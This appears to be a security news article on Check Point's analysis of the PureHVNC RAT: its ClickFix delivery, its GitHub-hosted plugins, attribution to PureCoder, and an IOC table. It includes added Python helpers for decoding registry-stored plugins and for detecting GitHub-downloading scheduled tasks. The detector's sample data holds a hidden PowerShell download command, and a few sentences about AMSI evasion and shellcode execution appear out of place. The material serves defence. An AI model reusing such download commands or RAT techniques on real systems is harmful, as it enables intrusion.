The developers behind the PureHVNC remote access trojan (RAT) have been uncovered using GitHub repositories to host critical components and plugin source code for their Pure malware family.
Check Point Research’s recent forensic analysis of an eight-day ClickFix intrusion campaign reveals that PureHVNC’s command-and-control (C&C) server delivered GitHub URLs to infected machines, a practice previously unseen in high-confidence attribution for this threat actor.
By mapping these repositories to accounts operated by the malware author known as PureCoder, investigators have gained rare insights into the malware ecosystem, developer practices, and potential geographic footprint of this sophisticated operation.
During a mid-2025 incident response engagement, Check Point’s team traced a phishing campaign employing the ClickFix social engineering technique, wherein victims were fooled into executing a PowerShell payload by visiting a fake job listing.
The initial loader, written in Rust, installed the PureHVNC RAT with the campaign identifiers “2a” and “amazon3.”
During the eight-day intrusion, the attacker used malicious JavaScript files, deployed two instances of PureHVNC RAT, established persistence on the victim’s system, and finally executed the Sliver Command and Control (C2) framework.
The RAT maintained persistence via scheduled tasks and used SSL-secured communications to exfiltrate system information—including installed antivirus products, user privileges, OS details, and idle time—in compressed, chunked payloads of up to 16 KB.
Investigators extracted PureHVNC’s full command set, configuration schema, and plugin mechanism, noting the malware’s use of registry-stored, compressed plugin data that is dynamically reversed and decompressed at runtime.
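The plugin storage described above, as an added worked example that is not part of Check Point's report or the malware's own code: a small Python helper that takes a registry value in the described form (compressed plugin bytes stored in reversed byte order), undoes the reversal and decompresses it so the module can be examined. The compression wrapper (gzip, with zlib and raw deflate as fallbacks), the registry key and value name expected by `read_registry_blob`, and the sample plugin bytes are all assumptions or constructed test data.

```python
import gzip
import zlib

# Constructed stand-in for a plugin module (not a real PureHVNC plugin):
# an "MZ" header followed by filler, enough to exercise the decoder.
SAMPLE_PLUGIN = b"MZ" + b"\x00" * 14 + b"CONSTRUCTED-PLUGIN-BODY " * 8


def pack_plugin_blob(plugin: bytes, wrapper: str = "gzip") -> bytes:
    """Produce a registry value in the layout the report describes:
    compress the plugin, then reverse the byte order.

    This exists only to build test input; it mirrors the described
    storage format and is not the RAT's own code.
    """
    if wrapper == "gzip":
        packed = gzip.compress(plugin, mtime=0)
    elif wrapper == "zlib":
        packed = zlib.compress(plugin)
    else:
        raise ValueError(f"unknown wrapper {wrapper!r}")
    return packed[::-1]


def unpack_plugin_blob(blob: bytes) -> bytes:
    """Recover a plugin from its stored form: undo the reversal, then
    decompress.  gzip is an assumption about the wrapper; zlib and raw
    deflate are tried as fallbacks so the helper still works if a
    variant uses a different container around the same deflate stream."""
    data = blob[::-1]
    attempts = (
        ("gzip", gzip.decompress),
        ("zlib", zlib.decompress),
        ("raw deflate", lambda d: zlib.decompress(d, -zlib.MAX_WBITS)),
    )
    errors = []
    for name, decompress in attempts:
        try:
            return decompress(data)
        except (OSError, EOFError, zlib.error) as exc:
            errors.append(f"{name}: {exc}")
    raise ValueError("value is not a reversed compressed blob (" + "; ".join(errors) + ")")


def looks_like_pe(data: bytes) -> bool:
    """Sanity check on the result: plugin modules are PE files, so a
    recovered blob should start with the 'MZ' signature."""
    return data[:2] == b"MZ"


def read_registry_blob(key_path: str, value_name: str) -> bytes:
    """Read a REG_BINARY value under HKCU on a Windows triage host.
    key_path and value_name are hypothetical: the report does not name
    the key the RAT uses, so supply them from your own forensic findings."""
    import winreg  # Windows-only module, imported lazily

    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path) as key:
        value, _ = winreg.QueryValueEx(key, value_name)
    return bytes(value)


if __name__ == "__main__":
    stored = pack_plugin_blob(SAMPLE_PLUGIN)
    recovered = unpack_plugin_blob(stored)
    print(f"stored {len(stored)} bytes -> recovered {len(recovered)} bytes, "
          f"PE header present: {looks_like_pe(recovered)}")
```

On a live triage host, replace the constructed `stored` value with `read_registry_blob(...)` pointed at the key identified during analysis; a reversed gzip stream is easy to spot by eye because the `1f 8b` magic appears as `8b 1f` at the very end of the value rather than at its start.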
Analysis of the PureRAT builder revealed enums for PureCrypter integration, demonstrating how customers could select encryption options, persistence methods, and code injection techniques.
This integrated toolkit underscores the modular design philosophy of the Pure malware suite, enabling threat actors to tailor deployments for diverse objectives.
GitHub Hosting Reveals Developer Link
A pivotal finding emerged when the RAT contacted its C&C and downloaded three distinct GitHub URLs. Initial assumptions posited that these accounts belonged to customers distributing additional payloads.
The malware also disables AMSI’s runtime scanning capabilities, thereby evading detection and analysis by security products that rely on AMSI for real-time malware inspection.

However, reverse engineering of the PureRAT administration-builder uncovered that these hardcoded URLs are an intrinsic part of the builder itself.
This discovery directly links the GitHub accounts—one named testdemo345 and another labeled DFfe9ewf/PURE-CODER-1—to PureCoder, rather than to intermediary operators or crimeware customers.
The repositories house executable modules and plugin source files for TwitchBot and YoutubeBot extensions, which enable followers, likes, and ad-click operations on streaming platforms.
Metadata from Git commits indicates timestamps corresponding to UTC+0300, suggesting that PureCoder operates within this timezone, potentially placing them in Eastern Europe or Western Asia.
As the last step, the Rust Loader creates a heap, copies the decrypted payload buffer into it, and executes the shellcode.

Although exact attribution remains challenging, these indicators equip law enforcement and threat intelligence teams with actionable leads for further investigation.
Implications and Future Outlook
The revelation that PureHVNC and related malware components are hosted in plain sight on a mainstream development platform challenges conventional threat actor tradecraft.
Check Point further identified a PureRAT builder and administration console supporting multiple languages (English, Russian, and Chinese).

Hosting modules on GitHub offers high availability and redundancy, simplifies version control for developers, and evades basic network filtering by leveraging legitimate HTTPS traffic.
However, this practice also introduces a traceable footprint; investigators can monitor repository creation, commit patterns, and account activity to anticipate future updates or identify associated projects.
Organizations should prioritize monitoring network logs for anomalous GitHub API calls and unusual repository clones originating from endpoints.
Endpoint detection tools should flag scheduled tasks referencing GitHub downloads, especially when combined with encrypted SSL streams to non-standard ports.
Proactive threat hunting exercises focusing on emerging PureCrypter and PureLogs variants may uncover early indicators of compromise in environments targeted by PureRAT campaigns.
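One way to turn the two monitoring recommendations above into a concrete rule, added here as an example that is not part of Check Point's report or of any product: a Python correlator over constructed endpoint telemetry that flags scheduled tasks whose action fetches from GitHub-hosted URLs and raises the severity when the same host also has an outbound TLS stream to a port other than 443 or 8443. The event schema, hostnames, commands and destination addresses are constructed for the example.

```python
import json
import re

# Hosts that serve GitHub-hosted files; a task action referencing any of
# them counts as a "GitHub download" for this rule.
GITHUB_DOWNLOAD = re.compile(
    r"https?://(?:www\.)?(?:github\.com|raw\.githubusercontent\.com|"
    r"objects\.githubusercontent\.com)/",
    re.IGNORECASE,
)
# Ports where outbound TLS is unremarkable; anything else is "non-standard".
STANDARD_TLS_PORTS = {443, 8443}

# Constructed sample telemetry as JSON lines (not logs from the real intrusion):
# scheduled-task creation events and outbound TLS connection events per host.
SAMPLE_EVENTS = r"""
{"type": "task_created", "host": "WS-017", "task": "\\Updater", "command": "powershell -w hidden -c iwr https://raw.githubusercontent.com/example-org/example-repo/main/x.bin -OutFile $env:TEMP\\x.bin"}
{"type": "net", "host": "WS-017", "dst": "203.0.113.10", "port": 5055, "proto": "tls"}
{"type": "task_created", "host": "WS-021", "task": "\\OneDriveSync", "command": "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background"}
{"type": "net", "host": "WS-021", "dst": "198.51.100.5", "port": 443, "proto": "tls"}
{"type": "task_created", "host": "WS-033", "task": "\\DevTools", "command": "git clone https://github.com/example-org/internal-tool"}
{"type": "net", "host": "WS-033", "dst": "203.0.113.44", "port": 443, "proto": "tls"}
"""


def parse_events(text: str) -> list:
    """Parse JSON-lines telemetry into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def task_references_github_download(command: str) -> bool:
    """True when the scheduled task's action contains a GitHub-hosted URL."""
    return bool(GITHUB_DOWNLOAD.search(command))


def nonstandard_tls_destinations(events: list, host: str) -> list:
    """(dst, port) pairs for TLS connections from `host` to non-standard ports."""
    return [
        (e["dst"], e["port"])
        for e in events
        if e.get("type") == "net"
        and e.get("host") == host
        and e.get("proto") == "tls"
        and e.get("port") not in STANDARD_TLS_PORTS
    ]


def evaluate(events: list) -> list:
    """Apply the rule: a GitHub-downloading task is a medium finding on its own
    and becomes high when the host also talks TLS to a non-standard port."""
    findings = []
    for e in events:
        if e.get("type") != "task_created":
            continue
        if not task_references_github_download(e.get("command", "")):
            continue
        extra = nonstandard_tls_destinations(events, e["host"])
        findings.append({
            "host": e["host"],
            "task": e["task"],
            "severity": "high" if extra else "medium",
            "tls_nonstandard": extra,
        })
    return findings


if __name__ == "__main__":
    for finding in evaluate(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(finding))
```

Run against the constructed sample, WS-017 (hidden PowerShell task fetching from raw.githubusercontent.com plus TLS to port 5055) is reported as high, WS-033 (a developer's `git clone` task with only port-443 traffic) as medium for analyst triage, and WS-021 is not reported at all. Keeping the task-only case at medium rather than alerting on it outright is deliberate: legitimate GitHub use is common on developer endpoints, and the report's point is that the combination with unusual encrypted traffic is what distinguishes the RAT's behaviour.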
As the Pure malware family evolves, its developers are likely to diversify hosting solutions—potentially migrating to alternative code-sharing platforms or embedding payloads directly within the builder interface.
Security teams must therefore adopt adaptive detection strategies that blend signature-based controls with behavior-based analytics.
By understanding the developer’s operational practices and infrastructure preferences, defenders can gain strategic advantage over this adaptable and increasingly prevalent threat actor.
Indicators of Compromise
| Description | Value (file hashes are SHA-1) |
|---|---|
| JavaScript File | 85513077AADBE50FE68055F0420DA2E6B97BD30D |
| JavaScript C&Cs | stathub[.]quest, stategiq[.]quest, mktblend[.]monster, dsgnfwd[.]xyz, dndhub[.]xyz |
| First PureHVNC RAT | E3A79CE291546191A5DDB039B2F9BF523BB9C4FB |
| Inno Setup Second PureHVNC RAT | D340B780194D44EE9B8D32F596B5A13723ABBE1D |
| Rust Loader | 99CBBE5F68D50B79AF8FB748F51794DE137F4FE4 |
| PureHVNC | 34EC79AB8A00DC6908874CDF7762756A2DCA4274 |
| PureHVNC C&C | 54.197.141[.]245 |
| GitHub account | hxxps://github[.]com/DFfe9ewf |
| GitHub – chromedriver.exe | 2E5050C50D3A8E9F376F0AE9394CF265ED3DCF06 |
| GitHub – msedgedriver.exe | 7B133998E526B3BEE151329171C82CA1837C86F9 |
| GitHub – WebDriver.dll | 39D3B6BEE5450D82D096AD7BDF4244FCB7B1EB81 |
| PureRAT Builder | 17E14B3CCF309FD9B5F7A5068A5CEDDD15FDEA0F |